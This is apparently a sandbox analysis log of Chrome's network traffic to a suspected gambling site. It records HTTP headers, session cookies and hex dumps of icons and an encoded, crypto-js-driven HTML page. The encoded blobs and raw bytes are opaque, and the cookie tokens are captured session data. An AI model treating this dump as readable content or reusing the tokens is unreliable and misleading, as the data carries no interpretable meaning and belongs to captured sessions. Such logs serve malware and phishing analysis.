                                                      2025-01-12 23:48:03 UTC4096INData Raw: ea be 0d 0c af 76 36 78 e7 07 ea 2b f7 e9 14 3d 31 a6 d4 ad 2b b3 69 f5 03 25 d8 b0 11 95 09 74 5b 29 e2 30 f0 95 46 95 0e 4d f5 b5 ab 9c b3 a1 33 11 64 b4 63 6e 0c 26 4c 0f 57 16 2e 0a bf 0e 27 5e 0d c8 c4 4b a9 b1 4a 92 23 ef d4 14 41 2c 85 d2 e1 d6 3a 68 77 e0 ad c7 42 9a 68 54 ff 1f c2 ab 42 7b cd 9d 36 12 fc 2a bb bb e4 de 76 17 0c 0a bb 80 f7 26 c1 7b e3 c6 03 6a ad 11 bb 24 72 de ef ac f3 72 67 03 8c 77 ea bc cf 47 58 e9 9d 65 df 85 4b bb d3 cc ab 9d 65 a2 58 d6 67 c1 bb bb 8b f8 89 f0 78 26 fe 33 d0 42 75 2b ed 52 e1 95 48 a8 3b 3d 9d 26 be 32 e7 0a 2f 76 2a 31 44 6f ed e0 1d d0 8f 1a 58 79 e7 07 6a ed a7 d3 8e 9d 23 ac c8 cd b8 76 a1 d9 3e 5c 77 43 c5 dd 04 59 46 71 75 8d ef 4a 44 f0 a6 fe d2 48 8e 8d 0b d6 65 0d 43 67 56 a4 6a 95 95 02 4f 85 09
                                                      Data Ascii: v6x+=1+i%t[)0FM3dcn&LW.'^KJ#A,:hwBhTB{6*v&{j$rrgwGXeKeXgx&3Bu+RH;=&2/v*1DoXyj#v>\wCYFquJDHeCgVjO
                                                      2025-01-12 23:48:03 UTC4096INData Raw: 1b a0 58 37 06 78 81 ef a1 3b 83 80 f7 af cf 02 f0 7e 1f 02 ef 1f 58 e7 35 c1 3b b1 fc dd 60 78 be 5b 9e 07 bc 9c 6e 8d 5e 33 bc 60 f8 b1 60 eb c5 8a 78 10 de 35 12 6f 4a e0 ad 42 bc 14 7d c6 26 ec 0e 17 1a b1 44 47 5f 71 d2 61 b7 ea 2b 0e 22 5e 29 bc e8 bb 14 de 0a bc ce 8f 84 e1 04 c0 46 54 e0 4b d4 77 53 c3 23 6e 67 10 76 39 cc 6e 7e b6 92 af a4 60 5e 7a 71 0a e7 ec 2c c1 9b a9 1f d7 e9 c5 db 5e cf bc 47 15 f5 1a e0 7d e2 b0 5c 45 de 4f 79 d7 3d 82 26 2c eb 39 a5 c0 ab 1f a2 08 6a f6 46 32 99 fc 41 91 2f 81 1b 38 b3 e1 b6 87 ee ed 7b d7 ce 5e bb 76 ef a2 8a ef 6d b5 f4 0e 4c 20 5f fc 19 34 2f 90 45 de d3 6a 83 5a 1a 36 96 fd b8 72 fc f4 ae f8 e0 3d 9c e8 4e 80 d5 40 ff 05 d3 b2 4c ac 9f 5c a6 2d f7 fb 23 ec 5a 34 5b 1b 56 c4 ab e3 2b f4 ca 64 2d 91 e8
                                                      Data Ascii: X7x;~X5;`x[n^3``x5oJB}&DG_qa+"^)FTKwS#ngv9n~`^zq,^G}\EOy=&,9jF2A/8{^vmL _4/EjZ6r=N@L\-#Z4[V+d-
                                                      2025-01-12 23:48:03 UTC4096INData Raw: 80 ae 66 77 04 ec 8e 48 de 15 7a f1 20 bd 74 3d b3 6b b9 6f 18 5e 46 95 06 01 97 ea d3 32 85 83 42 6d 67 b3 68 b4 7c 36 7b af f1 5d a6 b7 5c b6 4b 0d 25 7a 96 3c 2f 37 3a f1 6d 56 e0 2d 6b 78 47 01 af 0e ba 00 d6 1c 9c 7c a5 de 10 cd ae 15 1b fa 7a 6d b9 26 f3 8a 22 32 af ed bb 04 ef 49 6e 3f e7 cc 10 03 bb 7f 23 ec 4e ef bb ca 57 24 bc 08 be fe b9 f1 7d 1a e4 1a df dd c3 db 80 57 52 ef e4 7c 70 d3 bb 81 57 c5 be 79 57 bd bb aa fa 7b 4f 3f e8 3c ae 92 58 9f 70 b7 c9 78 75 57 4e 5b f0 c6 2b eb 7a 4d 98 eb 0e 15 c0 4c 6b 21 95 f9 23 e0 8d 9a b0 89 1f db a1 d7 86 17 c6 4b a9 01 f0 d2 7f 71 90 9b 20 df 65 74 9f 1d e6 23 43 f2 98 dd 11 66 d7 52 06 07 d8 bd 0e e5 53 d0 4a 4f 01 f8 22 3b 36 e8 15 14 4d ad 26 16 97 7a 94 8f 28 57 d2 04 41 dd 90 cf 66 83 c6 0b 8d
                                                      Data Ascii: fwHz t=ko^F2Bmgh|6{]\K%z</7:mV-kxG|zm&"2In?#NW$}WR|pWyW{O?<XpxuWN[+zMLk!#Kq et#CfRSJO";6M&z(WAf


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      133192.168.2.44988620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:03 UTC394OUTGET /plugins/jquery-ui/images/ui-icons_777777_256x240.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:03 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:03 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 7013
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1b65"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:03 UTC3741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 f0 08 04 00 00 00 45 9e 72 40 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 02 62 4b 47 44 00 77 64 ec c7 ad 00 00 00 07 74 49 4d 45 07 e0 07 0d 05 1a 36 e3 86 18 46 00 00 1a 74 49 44 41 54 78 da ed 9d 7f 6c 65 47 75 c7 3f 77 b3 4b d6 c9 86 3e 43 4b 64 8b 2a fb 43 69 fa 43 d5 be c4 8e 20 d5 56 79 6e 4b d9 24 12 b1 b7 a2 54 95 2a d9 49 b4 2e 42 4d 20 52 45 05 95 48 a8 50 ff 22 49 41 51 bb 11 ac b7 48 20 51 50 bc 1b 51 58 e8 0f 3b 4a d4 42 b0 b3 5e a5 4d 49 51 7e 49 c5 56 45 db f7 9a fe e1 a0 84 dc fe 71 7f cd dc 3b bf ee bd ef f9 3d fb ce d7 7a be ef dd 33 33 77 66 ce 99 33 73 e7 cc 9c 09 3e 8e 47 93 b1 6f d8 19 f0 18 2e bc 00 34 1c 5e 00 64 4c 10 32 31 ec 4c ec 24 bc 00 88 98
                                                      Data Ascii: PNGIHDREr@gAMAabKGDwdtIME6FtIDATxleGu?wK>CKd*CiC VynK$T*I.BM REHP"IAQH QPQX;JB^MIQ~IVEq;=z33wf3s>Go.4^dL21L$
                                                      2025-01-12 23:48:03 UTC3272INData Raw: 52 01 16 95 61 6c 47 b2 98 5a ff 1a 37 0b 22 70 73 c1 fe 7f 8c 17 e9 92 0d 3f 8f 29 e8 f2 ef 3c 6c 4e 63 ea d0 17 ac ec 87 99 dc 6b 60 11 3d 41 c4 f3 78 83 df e3 6b 00 3c 46 97 37 14 21 1e 02 16 f2 71 5d cd c1 c7 e3 d7 1f 8f 41 a3 03 79 35 dd 17 cc 03 14 45 d0 af 07 68 38 bc 2d a0 e1 f0 02 d0 70 78 01 68 38 bc 00 34 1c cd 13 80 c8 6c dc 51 50 3a a9 29 f7 06 87 74 74 b6 be 5d e6 91 58 14 80 e3 69 05 1c af 9c 5e 75 ff 00 75 d1 22 e4 6c fc fd ac 76 55 c3 03 b1 0d 62 a5 20 02 bf c1 0a a7 38 c5 f5 5c cf 0f f8 a5 42 cc a8 76 3e 16 ff 12 4f 3a 8e 70 23 77 10 72 0b b7 10 72 07 37 16 e2 9b dd 57 e4 57 33 e4 d7 33 14 e9 b6 10 b3 85 67 c8 f4 a4 20 e9 6b e0 71 36 58 e5 2f 80 25 5a a9 d9 b3 98 88 8b 2b c9 c1 ac 7a 9f 67 89 36 97 39 ce 86 62 52 25 7a f2 12 77 71 36 9e
                                                      Data Ascii: RalGZ7"ps?)<lNck`=Axk<F7!q]Ay5Eh8-pxh84lQP:)tt]Xi^uu"lvUb 8\Bv>O:p#wrr7WW33g kq6X/%Z+zg69bR%zwq6


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      134192.168.2.44988520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:03 UTC615OUTGET /images_plus/main/favicon.ico?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:03 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:03 GMT
                                                      Content-Type: image/x-icon
                                                      Content-Length: 1150
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-47e"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:03 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 22 cf de ff 1b df ff ff 1b df ff ff 32 a7 8a ff 4c 68 05 ff 32 a7 8a ff 1e d7 ee ff 1b df ff ff 2f af 9b ff 49 70 16 ff 1e d7 ee ff 1b df ff ff 22 cf de ff 38 98 69 ff 4c 68 05 ff 4c
                                                      Data Ascii: h( LhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLh"2Lh2/Ip"8iLhL


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      135192.168.2.44988720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:03 UTC394OUTGET /plugins/jquery-ui/images/ui-icons_555555_256x240.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:03 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:03 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 7074
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1ba2"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:03 UTC3741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 f0 08 04 00 00 00 45 9e 72 40 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 55 b1 8c 86 49 00 00 00 07 74 49 4d 45 07 e0 07 0d 05 1a 36 e3 86 18 46 00 00 1a 85 49 44 41 54 78 da ed 9d 7b 8c 24 47 7d c7 3f 6d 3b b1 08 f1 d9 21 c4 3e ec f3 9d b0 12 6c 02 98 dc ae ad 88 47 24 2c e4 cc 26 d2 25 80 7c ce dc a2 00 01 e7 d6 81 f0 14 b9 5d 9c 5d ff e1 3d cc ce 92 18 3f 70 74 67 d9 04 59 da 47 ee 1c 20 b6 14 cf 62 8c 91 09 27 c0 ec 1d cf 38 24 c1 66 0f 87 3b f8 23 84 e3 8f c8 41 b8 f3 47 bf aa ba eb d5 dd 33 3b b3 d3 f5 3d ed cd 4c ff aa
                                                      Data Ascii: PNGIHDREr@gAMAa cHRMz&u0`:pQ<bKGDUItIME6FIDATx{$G}?m;!>lG$,&%|]]=?ptgYG b'8$f;#AG3;=L
                                                      2025-01-12 23:48:03 UTC3333INData Raw: 3f 32 d2 8a 3a f6 09 52 93 2d 09 6b 4c 80 66 03 fd cf f9 44 3c ef bf 9e 4f f0 73 45 88 3d 4c b2 9c 8f eb aa 0e 9e ae b1 3c e1 51 06 1d 28 31 f9 73 47 34 44 15 28 e8 ed 01 1a 0e af 0b 68 38 3c 01 1a 0e 4f 80 86 c3 13 a0 e1 68 1e 01 22 b5 b1 ea 9d a6 93 aa 72 df ed 90 ce 79 ca ab 43 77 3c bc 0d 22 01 a6 d3 0a a8 fe 1a 52 dd 3f 40 5d b4 08 d3 ed 5a c7 b5 56 0d 9f 8b df ff 0f 14 28 f0 51 0e 70 0f f7 f0 4e de c9 9d bc af 10 33 aa 9d 07 e3 5f e7 01 e7 c5 ff 22 dc c4 c7 09 b9 85 5b 08 f9 38 37 15 e2 9b dd 57 e4 ad 19 f2 f6 0c 45 b9 2d 44 d1 d3 83 2c 8f 91 bd 06 4e b3 c0 49 1e 06 de c6 b9 a9 da b3 98 88 ed 94 6d e8 97 d5 fb 12 93 cc d0 61 9a 05 c5 a2 4a 74 e7 13 8c 71 9c dd 9a 5c 24 0b b2 37 70 2f c5 95 c2 57 a5 df cf f0 1d c5 5a e8 09 be ca 14 33 74 e2 74 e4 e5
                                                      Data Ascii: ?2:R-kLfD<OsE=L<Q(1sG4D(h8<Oh"ryCw<"R?@]ZV(QpN3_"[87WE-D,NImaJtq\$7p/WZ3tt


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      136192.168.2.44988820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:05 UTC385OUTGET /images_plus/main/favicon.ico?ver=1606790107 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:05 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:05 GMT
                                                      Content-Type: image/x-icon
                                                      Content-Length: 1150
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-47e"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:05 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 4c 68 05 ff 22 cf de ff 1b df ff ff 1b df ff ff 32 a7 8a ff 4c 68 05 ff 32 a7 8a ff 1e d7 ee ff 1b df ff ff 2f af 9b ff 49 70 16 ff 1e d7 ee ff 1b df ff ff 22 cf de ff 38 98 69 ff 4c 68 05 ff 4c
                                                      Data Ascii: h( LhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLhLh"2Lh2/Ip"8iLhL


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      137192.168.2.449889154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:13 UTC1379OUTGET /egame/224 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: document
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; vanguard_session=eyJpdiI6IkpzQnVUWkllekNoT1NvZmx2VSswQkE9PSIsInZhbHVlIjoieWpTQ0luNDY1cTZ3VFlDN2cyWDBSKzljTDhsWkpBSnZqSEF3TWNPeHZRQklhaTcyc3dnTnJYQ3BESDRSWWRWMjVZcTJRZFN4aEhISSsrU01VNDdTcUE9PSIsIm1hYyI6ImJiMDc1ZTBkYmI3NTAxNzEyZWM1NmY0OGM5YTUyMTgzNWY2YTY2ZjhiNGU2NTRkNDAxNzhiZmNlODRjMjZmNzEifQ%3D%3D
                                                      2025-01-12 23:48:14 UTC1112INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:14 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: no-cache, private
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IjBsZDJ0a3hCTDBuSGhDNTBORFFUcVE9PSIsInZhbHVlIjoiWVNaU2xVRXhZVjF6TW1kbytmUTV1UkVIRmRVNkJnQUFJdWhGYUVLNm51M2VBZ3F4UHYxd1ZJZUlnUXcwdnF2MkZrUWZJdHFoU25zTHl4UHN4VFJxY0E9PSIsIm1hYyI6IjllMGQ3NmU3NmRmZjVlYzczZmMyYjU3NjllNmM3NTVkOTkxMzk2ODRkZTcyOGUwZDEzZmQ5MTFmN2Q5NDI0OTgifQ%3D%3D; expires=Mon, 13-Jan-2025 01:48:14 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                      Set-Cookie: vanguard_session=eyJpdiI6InNHR2l3SDRCenJrYmtUSTYrT0dDeVE9PSIsInZhbHVlIjoiSVJsSktTWllHVVlkMHNqbmNyNXZwOFE0bDR6WnVObWRMK0ZOWWVVQll5XC90YnhhVmJNRG8xUXdNMGgySHVlOWZOSUJKZUpROTdcLzJlZXA2OU5NN21rZz09IiwibWFjIjoiM2NlZWI4ZDFmMjAyNDA5MjE5OWYxZGMwNjQ5YmM5MzJhMzViN2ViMTY1ODUwYjkzOGQ4OTVlMmVmMmEzM2Y0MSJ9; expires=Mon, 13-Jan-2025 01:48:14 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
                                                      2025-01-12 23:48:14 UTC15272INData Raw: 62 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 35 67 65 74 66 61 62 2e 73 65 67 72 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 73 5f 70 6c 75 73 2f 6d 61 69 6e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 65 72 3d 31 36 30 36 37 39 30 31 30 37 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 70 6c 75 73 2f 6a 73 2f 75 6e 69 74 65 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79
                                                      Data Ascii: bb4<!DOCTYPE html><html><head><title></title><meta charset="utf-8"><link rel="shortcut icon" href="//5getfab.segrft.com/images_plus/main/favicon.ico?ver=1606790107"><script type="text/javascript" src="/plus/js/unite/crypto-js.min.js"></script><script ty
                                                      2025-01-12 23:48:14 UTC16384INData Raw: 7a 62 33 42 70 7a 44 52 76 6f 79 74 54 6e 55 63 42 2b 64 7a 4b 73 48 6b 36 33 56 77 4b 2f 34 46 57 6f 4c 31 62 72 54 70 46 6b 54 34 44 2f 64 57 35 79 35 56 50 55 71 7a 78 6a 74 62 41 79 69 78 34 32 54 32 65 64 6a 57 58 63 51 55 54 38 46 2f 4c 35 72 6c 33 7a 41 68 31 51 62 69 66 4a 48 33 70 49 37 2b 49 77 55 68 4f 4e 46 63 51 41 4f 47 77 4c 78 77 55 6c 4c 4f 5a 66 2b 41 30 74 50 49 62 56 6f 6d 53 51 33 50 75 4a 41 67 38 54 7a 61 35 32 43 69 5a 6e 57 2f 44 41 67 31 69 51 6c 2f 4c 52 44 45 65 32 38 6c 58 74 58 67 6c 56 71 32 39 6b 70 50 41 52 71 57 54 2f 72 48 67 39 48 39 6f 49 53 6a 44 6b 51 4e 37 4f 51 4c 34 45 7a 37 6f 41 65 69 44 61 30 63 32 35 43 33 68 34 4c 78 6b 49 54 4e 66 6c 31 47 55 74 65 76 56 4c 66 37 7a 49 43 35 53 7a 54 4f 76 47 4e 38 42 66 37
                                                      Data Ascii: zb3BpzDRvoytTnUcB+dzKsHk63VwK/4FWoL1brTpFkT4D/dW5y5VPUqzxjtbAyix42T2edjWXcQUT8F/L5rl3zAh1QbifJH3pI7+IwUhONFcQAOGwLxwUlLOZf+A0tPIbVomSQ3PuJAg8Tza52CiZnW/DAg1iQl/LRDEe28lXtXglVq29kpPARqWT/rHg9H9oISjDkQN7OQL4Ez7oAeiDa0c25C3h4LxkITNfl1GUtevVLf7zIC5SzTOvGN8Bf7
                                                      2025-01-12 23:48:15 UTC16384INData Raw: 63 30 50 57 72 52 31 79 4f 66 0d 0a 66 66 38 0d 0a 49 44 4b 57 74 56 5a 69 7a 4c 79 62 41 47 43 79 75 38 74 73 6e 6b 6e 69 4b 65 59 71 38 65 61 59 44 79 66 49 32 76 49 4f 47 6e 49 46 66 65 66 2f 63 6e 2b 69 63 54 70 50 30 67 4e 78 30 78 4a 39 61 38 37 35 58 6c 41 57 57 34 37 61 38 48 64 4a 53 68 53 7a 73 32 6e 79 4c 57 66 43 74 56 5a 6f 50 44 31 2b 55 68 4b 46 6e 45 39 59 2b 77 74 4d 78 52 41 35 45 76 58 6c 49 4c 47 41 61 67 44 30 4d 5a 69 55 33 33 4a 59 68 41 6e 6c 35 64 4f 43 4f 39 46 62 77 78 32 54 63 32 70 64 55 70 2b 33 67 38 53 70 73 54 4c 41 54 57 67 6f 4e 2b 4f 44 59 73 57 39 4c 4e 64 78 39 43 71 6d 48 5a 73 4c 52 36 79 76 55 6f 6a 4f 6f 48 58 4e 35 43 70 73 41 75 44 47 4e 4d 78 58 48 47 2b 75 6d 6c 2f 6c 68 2f 44 38 55 54 51 71 2b 6b 34 2f 63 71
                                                      Data Ascii: c0PWrR1yOfff8IDKWtVZizLybAGCyu8tsnkniKeYq8eaYDyfI2vIOGnIFfef/cn+icTpP0gNx0xJ9a875XlAWW47a8HdJShSzs2nyLWfCtVZoPD1+UhKFnE9Y+wtMxRA5EvXlILGAagD0MZiU33JYhAnl5dOCO9Fbwx2Tc2pdUp+3g8SpsTLATWgoN+ODYsW9LNdx9CqmHZsLR6yvUojOoHXN5CpsAuDGNMxXHG+uml/lh/D8UTQq+k4/cq
                                                      2025-01-12 23:48:15 UTC16384INData Raw: 4e 44 55 2f 4d 49 68 56 0d 0a 31 66 66 38 0d 0a 70 49 66 72 37 7a 57 77 49 58 53 69 65 51 67 32 59 37 56 70 62 67 49 48 69 62 76 57 50 59 45 36 4b 76 52 35 52 6b 41 7a 65 39 36 46 43 70 65 63 51 70 69 79 6c 35 4e 51 6b 55 45 4b 72 67 48 51 6f 50 58 49 39 62 63 54 4e 67 6e 74 61 50 62 2f 4e 4c 61 4b 46 51 49 2f 70 61 32 75 76 48 42 58 4a 31 79 6d 63 63 4d 43 56 32 74 53 37 35 70 49 70 52 57 49 54 51 4b 6d 4f 63 50 79 4b 69 68 48 34 47 67 64 70 63 37 6f 73 67 6b 6b 79 47 33 53 7a 4e 63 47 54 56 38 43 75 32 39 38 31 67 53 4e 4f 38 6c 37 6f 79 54 65 54 6a 55 49 72 34 4a 37 37 35 65 7a 44 53 61 76 7a 46 41 4d 44 4a 78 69 31 38 6f 75 6d 32 6f 69 61 51 62 58 32 41 4b 30 47 34 71 6c 59 33 31 68 76 31 51 77 30 39 31 38 6f 35 6d 41 79 4f 66 35 61 6a 57 44 73 42 7a
                                                      Data Ascii: NDU/MIhV1ff8pIfr7zWwIXSieQg2Y7VpbgIHibvWPYE6KvR5RkAze96FCpecQpiyl5NQkUEKrgHQoPXI9bcTNgntaPb/NLaKFQI/pa2uvHBXJ1ymccMCV2tS75pIpRWITQKmOcPyKihH4Ggdpc7osgkkyG3SzNcGTV8Cu2981gSNO8l7oyTeTjUIr4J775ezDSavzFAMDJxi18oum2oiaQbX2AK0G4qlY31hv1Qw0918o5mAyOf5ajWDsBz
